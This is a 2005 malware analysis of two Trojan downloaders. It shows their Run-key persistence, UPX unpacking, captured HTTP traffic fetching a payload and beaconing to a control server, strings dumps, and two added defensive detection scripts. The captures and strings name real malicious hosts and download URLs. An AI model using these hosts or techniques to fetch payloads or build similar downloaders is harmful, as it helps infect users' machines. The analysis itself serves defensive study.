Free Samples: A Trojan on the Job
infectionvectors.com, March 2005
Overview
Trojan horse delivery has improved tremendously over the last few years. At one point users had to seek out, download, and execute applications to infect their local machines. The applications were modified to include additional (nefarious) functionality that often allowed an attacker to control the victim computer, mine specific data from the box, or automatically download additional code. Recently the trend has been to deliver Trojans via web exploits, employing active scripting to force code onto a machine without requiring the user to click on anything other than a web link. In many cases the web site being visited is completely free of external modification; the attack comes through the banner ads piped to the site from an outside provider (whether the site in question is still liable for such attacks is a debate that has yet to be settled).
Trojans are not a new classification of malware. One characteristic of many modern Trojans is the clear profit motive behind them: they are often "sponsored" by organizations that generate revenue by delivering ads to users (or, more accurately, delivering users to advertisers). Although the terms "spyware" and "adware" are often used to describe this type of Trojan, the only distinction in the software is this obvious profit motive. The same motive can be seen in many other types of malware, such as the mass mailers Sobig and Beagle, both with clear spamming interests at their hearts. These revenue-generating worms are still mass-mailing worms, not "adware."
Hitchhikers on the Superhighway
This section looks at a pair of companion Trojans that attempt to install additional software, open backdoors for pop-ups, and lower the security settings of the victim machine's browser. They may be flagged by certain antivirus products (although not all have signatures for the example pieces of malware), but there is no standard name for these applications. Most products will recognize the basic traits of these programs and place them in the generic category of Trojan.Downloader, Dloader, or Agent.Downloader.
The first application was picked up via simple web browsing, the so-called hit-and-run delivery that has become common for Internet Explorer users. Using browser flaws such as the IFRAME overrun, these pieces of code install themselves through web pages carrying their code (known or unknown to the web site owner) and through banner advertisements carried by ad providers to all corners of the Internet. The downloaders in question are capable of installing themselves without user acceptance (hiding their true nature by using the names of Windows system files), establishing an autostart hook in the Registry (see the references for more details), and retrieving additional programs from the web. Often these additional applications are also identified as malware by antivirus scanners. There seems to be little room left to argue that these types of programs are legitimate software.
One sample obtained in March of 2005 exhibits all of the characteristics mentioned above. Although these pieces of malware change rapidly, to allow for changes in Trojan locations and to avoid detection, many can be grouped into families; the sample discussed here has relatives catalogued as Dloader on the Sophos site. For the purposes of this study, it is simply referred to as Downloader1.
Downloader1 is packed with UPX version 1.25, which was released in the summer of 2004. The file downloaded by the sample examined by infectionvectors.com was packed with UPX version 1.93, released as a beta in February of 2005, indicating that the author is updating the companion files. Repacking the applications is also likely an effort to avoid detection (especially considering the author used a compression tool still in its beta stage), the same tactic employed by more traditional virus/malware writers.
When the application is executed, by a user or script, it creates a copy of itself with the name "services.exe" in a new directory named "MSOffice," which the malware creates in the Windows folder. It then sets the following key to ensure that the application starts up with each restart:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run MSOffice "C:\WINDOWS\SYSTEM\MSOffice\services.exe"
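A defender-side check for the persistence step just described, added here as an example and not part of the original analysis: it parses Run-key values in the layout that `reg query` prints (the export below is constructed, with the first value mirroring the one Downloader1 writes) and flags any image that borrows a Windows system binary's file name but runs from outside a system directory, which is exactly how the MSOffice entry looks. The list of borrowed names and the set of system directories are assumptions for the example.

```python
import ntpath
import re

# Run-key values in the layout printed by `reg query` (name, type, data). The
# three entries are constructed for this example: the first mirrors the value
# Downloader1 writes, the other two are benign entries for contrast.
RUN_KEY_EXPORT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    MSOffice    REG_SZ    "C:\WINDOWS\SYSTEM\MSOffice\services.exe"
    ctfmon      REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Updater     REG_SZ    "C:\Program Files\Vendor\updater.exe" /background
"""

# Names of Windows system binaries that malware borrows (an assumed list for
# this example) and the directories those binaries legitimately live in.
SYSTEM_BINARY_NAMES = {"services.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
VALUE_RE = re.compile(r"^\s*(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$")


def extract_image_path(command):
    # Return the executable path: the quoted token if the command starts with a
    # quote, otherwise the first whitespace-delimited token.
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0]


def suspicious_run_entries(export_text):
    # Flag entries whose image carries a system binary's file name but does not
    # run from a system directory, which is how the MSOffice entry above looks.
    findings = []
    for line in export_text.splitlines():
        match = VALUE_RE.match(line)
        if not match:
            continue
        name, data = match.groups()
        image = extract_image_path(data)
        directory = ntpath.dirname(image).lower().rstrip("\\")
        if ntpath.basename(image).lower() in SYSTEM_BINARY_NAMES and directory not in SYSTEM_DIRS:
            findings.append((name, image))
    return findings


if __name__ == "__main__":
    for name, image in suspicious_run_entries(RUN_KEY_EXPORT):
        print("suspicious autostart: %s -> %s" % (name, image))
```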
Within seconds, the Trojan begins to retrieve additional code from the Internet; in fact, it checks the web regularly for updated software. It is coded to retrieve a program named "gamma.exe" and save it in the Windows directory under a random string of letters as its file name. That program is referred to here as Downloader2. The associated network traffic is shown below (from an Ethereal capture):
GET /gamma.exe HTTP/1.1
User-Agent: Windows Internet
Host: www.newiframe.biz
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2005 23:19:29 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.8
Last-Modified: Sat, 18 Dec 2004 17:25:01 GMT
ETag: "feb9c7-7a00-41c467ed"
Accept-Ranges: bytes
Content-Length: 31232
Connection: close
Content-Type: application/octet-stream

MZ [non-printable PE header bytes] This program cannot be run in DOS mode.
[Binary retrieval truncated here.]
Downloader2 carries retrieval strings for numerous pieces of software, some of which did not exist at the time of this writing. One piece of code that this Trojan does reach out for is the IST toolbar, by way of a web site often maligned in the abuse groups on the web (URL intentionally made unclickable; follow at your own risk):
http:// www.slotch. com/ist/softwares /v4.0/ istdownload.exe
The IST application is identified as spyware by McAfee's malware removal product. However, the McAfee site clearly states that much of the software found on PCs is there because a user accepted a usage agreement from IST (to read some of the McAfee warnings, see http://vil.nai.com/vil/content/v_116303.htm). The application is grabbed by:
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&retry=2& loadfirst=1&account_id=137837&delayload=0&adid=a1103101224
Another tactic often employed by malware authors is seen below. This spyware application registers the infected machine with a server controlled by its authors (again, from an Ethereal capture):
GET /xpsystem/report.php?user_id=0&status=0&country_id=1 HTTP/1.1
User-Agent: Windows Internet
Host: sp2admin.biz
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2005 23:19:31 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.8
X-Powered-By: PHP/4.3.8
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

5
false
0
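A small classifier for the two beacons shown above (the gamma.exe fetch and the report.php check-in), added as an example and not part of the original write-up: it parses raw HTTP request text of the kind Ethereal captures and reports which of the family's indicators each request matches (the "Windows Internet" User-Agent, the two hosts, and the /xpsystem/ and /gamma.exe paths, all taken from the captures and from Downloader1's strings output further down). The benign third request is constructed for contrast; reporting the indicators separately lets a weak hit (host alone) be weighted differently from a request matching all three.

```python
import re

# Two requests transcribed from the captures above plus a constructed benign
# Internet Explorer request for contrast (all three are sample data).
SAMPLE_REQUESTS = [
    "GET /gamma.exe HTTP/1.1\r\nUser-Agent: Windows Internet\r\n"
    "Host: www.newiframe.biz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    "GET /xpsystem/report.php?user_id=0&status=0&country_id=1 HTTP/1.1\r\n"
    "User-Agent: Windows Internet\r\nHost: sp2admin.biz\r\nConnection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n"
    "Host: www.example.com\r\nConnection: Keep-Alive\r\n\r\n",
]

# Indicators taken from the captures and from Downloader1's strings output.
BEACON_USER_AGENT = "Windows Internet"
BEACON_HOSTS = {"sp2admin.biz", "www.newiframe.biz"}
BEACON_PATHS = re.compile(
    r"^/(?:xpsystem/(?:report\.php|commands\.ini|crontab\.ini)|gamma\.exe)(?:\?|$)")
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")


def parse_request(raw):
    # Split the request head into method, target and a lower-cased header map.
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m.group(1), "target": m.group(2), "headers": headers}


def beacon_indicators(req):
    # Each matching indicator is reported separately so a single hit (say, the
    # host alone) can be weighted differently from a request matching all three.
    h = req["headers"]
    reasons = []
    if h.get("user-agent") == BEACON_USER_AGENT:
        reasons.append("user-agent")
    if h.get("host", "").lower() in BEACON_HOSTS:
        reasons.append("host")
    if BEACON_PATHS.match(req["target"]):
        reasons.append("path")
    return reasons
```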
The Door is Always Open
Within just a few minutes, the victim machine can be overrun with Trojans, all seeking to display unwanted advertisements and deliver even more software to the infected machine. Many of the applications in this family lower the established security settings on the machine, allowing unwanted applications from anywhere to enter the box (see CA's discussion of Win32/Chopenez). These tactics include allowing browser helper objects, adding sites to the Trusted Zone, and redirecting the browser to sites the user may normally avoid because of security concerns.
The Trojans discussed here are but a few specks in the pile of malware that now confronts Internet users at every turn. These types of applications play a large role in making the Internet less attractive to the general user, chipping away at the consumer base that e-commerce requires to flourish.
Unpacking of Downloader1:

C:\Malware\MSOffice>upx -d services.exe
                       Ultimate Packer for eXecutables
  Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004
UPX 1.25w       Markus F.X.J. Oberhumer & Laszlo Molnar        Jun 29th 2004

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     65536 <-     31744   48.44%    win32/pe     services.exe

Unpacked 1 file.

Unpacking of Downloader2:

C:\Malware>upx -d bmnxmyhl.exe
                       Ultimate Packer for eXecutables
  Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005
UPX 1.93 beta   Markus F.X.J. Oberhumer & Laszlo Molnar        Feb 7th 2005

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     61440 <-     31232   50.83%    win32/pe     bmnxmyhl.exe

Unpacked 1 file.
Downloader1: sample strings output:
0000D040 sp2admin.biz
0000D050 Uninstall Flag
0000D060 Terminate Flag
0000D074 Windows Internet
0000D090 explorer.exe
0000D0A8 Applications\iexplore.exe\shell\edit\command
0000D0DC Applications\iexplore.exe\shell\open\command
0000D10C SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
0000D150 %u %u %[
0000D159 0 , ] %[
0000D160 0 , ] %[
0000D170 Last Command
0000D180 Software\Microsoft\Internet Explorer\Main
0000D1AC http://%s/xpsystem/commands.ini
0000D1CF , ] %u %[
0000D1D9 , ] %[
0000D1E0 , ] %[
0000D1EC http://%s/xpsystem/crontab.ini
0000D20C kakogo_cherta_tebe_zdes_nado
0000D22C http://%s/xpsystem/report.php?user_id=%u&status=%u&country_id=%s
0000D270 SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0000D2A0 MSOffice
0000D2B0 user_id=%u
0000D2BC services.exe
0000D2CC \MSOffice\
0000D2DC \MSOffice\services.exe
0000D2F4 http://www.newiframe.biz/gamma.exe
Downloader2 contains the following snippet of references to ad-sponsored Trojans, familiar to most spyware/adware researchers:
0000C308 0040C308 0 updatestats
0000C31C 0040C31C 0 Internet Optimizer
0000C330 0040C330 0 DyFuCA Active Alerts
0000C348 0040C348 0 DyFuCA
0000C350 0040C350 0 safesurfingupdate
0000C364 0040C364 0 MS Updates
0000C370 0040C370 0 WebRebates0
0000C37C 0040C37C 0 Power Scan
0000C390 0040C390 0 IST Service
0000C39C 0040C39C 0 BullsEye Network
0000C3B8 0040C3B8 0 ixizgfcp
0000C3C4 0040C3C4 0 VGroup
0000C3CC 0040C3CC 0 MaxSpeed
0000C3EC 0040C3EC 0 Vendor
0000C3F4 0040C3F4 0 keenvalue
0000C400 0040C400 0 incredifind
0000C410 0040C410 0 updmgr
0000C418 0040C418 0 perfectnav
0000C424 0040C424 0 euniverse
0000C430 0040C430 0 180ax
0000C440 0040C440 0 bargain buddy
0000C450 0040C450 0 CashBack
0000C45C 0040C45C 0 safesurfing
0000C468 0040C468 0 ISTBar
0000C470 0040C470 0 ISTSvc
0000C47C 0040C47C 0 microsoft\sidefind
0000C490 0040C490 0 Voiceglo
0000C49C 0040C49C 0 IncrediFind
0000C4A8 0040C4A8 0 StatBlaster
0000C4B4 0040C4B4 0 Powerscan
0000C4C0 0040C4C0 0 YourSiteBar
0000C4CC 0040C4CC 0 WhenUSave
0000C4D8 0040C4D8 0 180Solutions
0000C4F4 0040C4F4 0 twaintec
0000C508 0040C508 0 Bargains
0000C514 0040C514 0 Avenue Media
0000C524 0040C524 0 SideFind
0000C530 0040C530 0 Lycos\SideSearch
0000C544 0040C544 0 exactutil
0000C550 0040C550 0 localnrd
0000C55C 0040C55C 0 avenue media
References
Autostart report on infectionvectors.com http://www.infectionvectors.com/vectors/startups.htm
Sophos catalogued code similar to this downloader http://www.sophos.com/virusinfo/analyses/trojdloadereu.html
CA's Chopenez write-up http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?ID=41192
Ethereal is available at
Copyright © 2005 infectionvectors.com. All rights reserved.